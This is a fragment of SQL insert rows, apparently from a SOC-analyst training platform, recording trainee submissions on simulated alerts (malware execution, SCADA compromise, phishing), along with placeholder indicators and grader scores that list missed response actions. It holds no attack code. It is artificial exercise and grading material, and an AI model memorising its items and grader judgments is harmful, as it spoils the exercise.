(303, 177, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:28:14 PM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T10:58:51.044Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 10:56:28', '2026-02-28 21:00:00', 0, NULL),
(304, 177, 270, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:30:36 PM\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T11:01:15.318Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 10:58:51', '2026-02-28 21:00:00', 0, NULL),
(305, 177, 271, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-10.0.0.5\",\"hash-5f4dcc3b\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"escalate\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:34:49 PM\\nALERT: Lateral Movement to OT Network [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.101\\n- [IP] 10.0.0.5\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [USERNAME] jdoe\\n- [IP] 203.0.113.55\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T11:05:26.381Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"isolate_host\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 11:01:15', '2026-02-28 21:00:00', 0, NULL),
(306, 177, 272, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.20\",\"hash-5d41402a\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:37:57 PM\\nALERT: SCADA System Compromise [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.20\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [IP] 203.0.113.45\\n- [FILENAME] malicious_script.sh\\n- [USERNAME] unauthorized_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T11:08:36.065Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 11:05:26', '2026-02-28 21:00:00', 0, NULL),
(307, 177, 274, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-22 11:08:55', '2026-02-22 11:08:55', 0, NULL),
(308, 189, 279, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"hash-b1946ac9\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/23/2026, 2:48:58 AM\\nALERT: Execution of Malicious Code [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [FILENAME] malicious.dll\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-02-23T01:49:31.601Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-23 01:32:39', '2026-02-28 21:00:00', 0, NULL),
(309, 189, 280, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.10\",\"hash-abc123de\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/23/2026, 3:02:11 AM\\nALERT: Establish Persistence [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.10\\n- [HASH] abc123def4567890abc123def4567890\\n- [USERNAME] admin_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou Mane\",\"submitted_at\":\"2026-02-23T02:02:24.889Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-23 01:49:31', '2026-02-28 21:00:00', 0, NULL),
(310, 189, 281, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.55\",\"ip-203.0.113.45\",\"hash-e99a18c4\",\"artifact_4\",\"artifact_6\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/23/2026, 3:15:04 AM\\nALERT: Lateral Movement and Data Exfiltration [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.55\\n- [IP] 203.0.113.45\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] confidential_data.xlsx\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-02-23T02:15:23.319Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-23 02:02:24', '2026-02-28 21:00:00', 0, NULL),
(311, 189, 285, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.92.220.34\",\"ip-10.0.2.15\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/23/2026, 3:35:15 AM\\nALERT: Spear-Phishing Email Campaign Detected [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 185.92.220.34\\n- [IP] 10.0.2.15\\n- [EMAIL] john.doe@fakeorg.com\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [URL] http://malicious-link.com/login\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-23T02:35:28.208Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-23 02:15:42', '2026-02-28 21:00:00', 0, NULL),
(312, 189, 286, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.14.22.5\",\"ip-203.0.113.45\",\"hash-d41d8cd9\",\"domain-http://login\",\"domain-login-secure\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/23/2026, 3:53:35 AM\\nALERT: Malicious Domain Infrastructure Identified [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 10.14.22.5\\n- [IP] 203.0.113.45\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [DOMAIN] http://login-secure-portal.com/login\\n- [DOMAIN] login-secure-portal.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou mane\",\"submitted_at\":\"2026-02-23T02:53:57.960Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-23 02:35:28', '2026-02-28 21:00:00', 0, NULL),
(313, 189, 287, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.25\",\"hash-e99a18c4\",\"artifact_2\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/23/2026, 4:08:23 AM\\nALERT: OAuth Token Abuse Technique Detected [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.25\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [USERNAME] j.doe@company.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou mane\",\"submitted_at\":\"2026-02-23T03:08:46.603Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-23 02:53:57', '2026-02-28 21:00:00', 0, NULL),
(314, 189, 288, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.92.220.50\",\"ip-192.168.1.105\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_hash\",\"reset_credentials\",\"block_ip\",\"isolate_host\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/23/2026, 4:12:20 AM\\nALERT: Disinformation Campaign Planning Uncovered [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 185.92.220.50\\n- [IP] 192.168.1.105\\n- [HASH] 8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\\n- [FILENAME] election_strategy_2023.pdf\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-23T03:12:26.166Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-23 03:08:46', '2026-02-28 21:00:00', 0, NULL),
(315, 189, 289, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.10\",\"artifact_1\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:23:48 AM\\nALERT: Phishing Email Detected [OP: Operation Black Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.10\\n- [EMAIL] attacker@example.com\\n- [URL] http://malicious-link.com/download\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] update-instructions.html\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED:Amadou MANE\",\"submitted_at\":\"2026-02-27T02:24:38.682Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-23 03:12:43', '2026-02-28 21:00:00', 0, NULL),
(316, 198, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-23 23:51:06', '2026-02-23 23:51:06', 0, NULL),
(317, 199, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-23 23:52:05', '2026-02-23 23:52:05', 0, NULL),
(318, 140, 744, 'investigating', NULL, NULL, NULL, NULL, '2026-02-24 07:28:45', '2026-02-24 04:20:45', '2026-02-24 04:20:45', 0, NULL),
(319, 209, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-25 11:04:36', '2026-02-25 11:04:36', 0, NULL),
(320, 174, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-26 04:41:54', '2026-02-26 04:41:54', 0, NULL),
(321, 174, 842, 'investigating', NULL, NULL, NULL, NULL, '2026-02-26 07:59:28', '2026-02-26 04:49:28', '2026-02-26 04:49:28', 0, NULL),
(322, 109, 1305, 'investigating', NULL, NULL, NULL, NULL, '2026-02-26 17:09:46', '2026-02-26 14:03:46', '2026-02-26 14:03:46', 0, NULL),
(323, 213, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"escalate\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:29:16\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:29:19.540Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:11:50', '2026-02-28 21:00:00', 0, NULL),
(324, 213, 1271, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.8.50\",\"ip-192.168.8.51\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:24:40\\nALERT: False Positive: Routine Database Synchronization Detected\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 192.168.8.50\\n- [IP] 192.168.8.51\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:24:47.726Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:19:30', '2026-02-28 21:00:00', 0, NULL),
(325, 213, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:30:49\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:30:51.247Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:29:19', '2026-02-28 21:00:00', 0, NULL),
(326, 213, 270, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:32:15\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:32:35.654Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:30:51', '2026-02-28 21:00:00', 0, NULL),
(327, 213, 271, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-10.0.0.5\",\"hash-5f4dcc3b\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:34:07\\nALERT: Lateral Movement to OT Network [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.101\\n- [IP] 10.0.0.5\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [USERNAME] jdoe\\n- [IP] 203.0.113.55\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:34:08.145Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:32:35', '2026-02-28 21:00:00', 0, NULL),
(328, 213, 272, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.20\",\"hash-5d41402a\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:35:25\\nALERT: SCADA System Compromise [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.20\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [IP] 203.0.113.45\\n- [FILENAME] malicious_script.sh\\n- [USERNAME] unauthorized_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:35:25.868Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:34:08', '2026-02-28 21:00:00', 0, NULL),
